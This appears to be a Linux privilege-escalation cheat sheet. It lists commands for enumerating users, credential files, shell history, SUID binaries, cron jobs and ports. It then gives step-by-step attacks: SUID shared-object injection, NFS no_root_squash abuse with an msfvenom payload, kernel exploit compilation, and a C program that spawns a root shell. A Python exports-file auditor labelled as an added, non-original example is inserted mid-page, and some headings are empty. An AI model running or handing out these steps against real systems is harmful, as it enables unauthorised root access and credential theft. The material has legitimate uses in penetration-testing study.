Linux Privilege Escalation
OS & User Enumeration :
############################### User Enumeration ################################

whoami
id
sudo -l
cat /etc/passwd
ls -la /etc/shadow

################################# OS Enumeration #################################

cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
arch
ldd --version

################################# Installed tools ################################

which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null

############################ File owners and permissions #########################

ls -la
find . -ls
history
cat ~/.bash_history
find / -type f -user <username> -readable 2>/dev/null # Files readable by the user
find / -writable -type d 2>/dev/null # Directories writable by the user
find /usr/local/ -type d -writable

################################## File mount ####################################

/mnt /media -> USB devices and other mounted disks
mount -> show all mounted drives
df -h -> list all partitions
cat /etc/fstab # list all drives mounted at boot time
/bin/lsblk

#################################### Applications ################################

dpkg -l # for Debian based systems

##################################### Cron tabs ##################################

ls -lah /etc/cron*
cat /etc/crontab
ls -la /var/log/cron* # Locating cron logs
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log # locating running jobs from the logs
grep CRON /var/log/syslog # grepping cron entries from syslog

#################################### Internal Ports ##############################

netstat -alnp | grep LIST | grep port_num
netstat -antp
netstat -tulnp
curl the listening ports

################################### Interesting DIRS #############################
/
/dev
/scripts
/opt
/mnt
/var/www/html
/var
/etc
/media
/backup

################################### SUID Binaries ################################

(https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/)

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
ldd /usr/bin/binary-name
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"

################################# Firewall Enumeration ###########################

grep -Hs iptables /etc/*

############################### Kernel Modules ##################################

lsmod
/sbin/modinfo <mod name>

PrivEsc Checklist :
SUID Shared Object Injection :
    Find a SUID binary that looks fishy
    strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"
    Pick a shared object the binary fails to find in a path where you have write access
    Create a shared object with the missing SO file name
    Run the SUID binary
NFS Misconfiguration :
    cat /etc/exports
    On Kali
      mkdir /tmp/nfs
      mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs
      msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
      chmod +xs /tmp/nfs/shell.elf
    On Target
      /tmp/shell.elf
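A way to audit an exports file for the misconfiguration the NFS steps above rely on, as an added example that is not part of the original page. It assumes standard exports(5) syntax and options (`root_squash` is the default, `no_root_squash` disables it, `all_squash` squashes every uid); the sample exports file is constructed.

```python
"""Audit an exports(5) file for entries that let a remote client's root user write
root-owned files: the precondition for the NFS steps above. Added example, not page code."""
from dataclasses import dataclass

@dataclass
class Export:
    path: str
    client: str
    options: set

def parse_exports(text):
    """Parse exports(5) syntax: a path followed by client(options) entries. '#' comments
    and backslash line continuations are honoured; missing options mean the defaults."""
    exports = []
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        if not specs:  # bare path: exported to every client with default options
            specs = ["*"]
        for spec in specs:
            client, _, opts = spec.partition("(")
            options = {o for o in opts.rstrip(")").split(",") if o}
            exports.append(Export(path, client or "*", options))  # "(opts)" alone = any client
    return exports

def root_is_squashed(options):
    # root_squash is the exports(5) default; all_squash maps root too, whatever else is set
    return "all_squash" in options or "no_root_squash" not in options

def audit(text):
    """Return (path, client, reason) for every export where a client's root keeps uid 0
    on a writable share and can therefore plant a root-owned SUID file on the server."""
    findings = []
    for e in parse_exports(text):
        if "rw" in e.options and not root_is_squashed(e.options):
            scope = "any host" if e.client == "*" else e.client
            findings.append((e.path, e.client, f"rw,no_root_squash for {scope}"))
    return findings

# Constructed sample exports file, not taken from any real system
SAMPLE = r"""
/srv/share  10.0.0.0/24(rw,sync,root_squash)   # root mapped to nobody: fine
/tmp        *(rw,no_root_squash)               # any client's root stays root here
/backup     backup.lab(rw,no_root_squash,all_squash) \
            10.0.0.5(ro,no_root_squash)
/public     (ro)
"""
```

Only `/tmp` is reported for the sample: the `/backup` entries are either all-squashed or read-only, and `/public` is read-only.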

Kernel Exploits

    cat /proc/version
    uname -r
    uname -mrs
    cat /etc/lsb-release
    cat /etc/os-release
    gcc exploit.c -o exp
    Compile the exploit on the local machine and upload it to the remote machine
      gcc -m32 -Wl,--hash-style=both 9542.c -o 9542
      apt-get install gcc-multilib # needed on the build host for the -m32 build
Recover Deleted Files :
C Program to SetUID /bin/bash :
gcc -Wall suid.c -o exploit
sudo chown root exploit
sudo chmod u+s exploit
$ ls -l exploit
-rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit

#include <unistd.h>

int main()
{
    setuid(0);                                /* the SUID bit already gives euid 0; make the real uid 0 as well */
    execl("/bin/bash", "bash", (char *)NULL); /* replace this process with a shell running as root */
    return 1;                                 /* only reached if execl fails */
}

./exploit
# whoami
root
Tools :
Resources :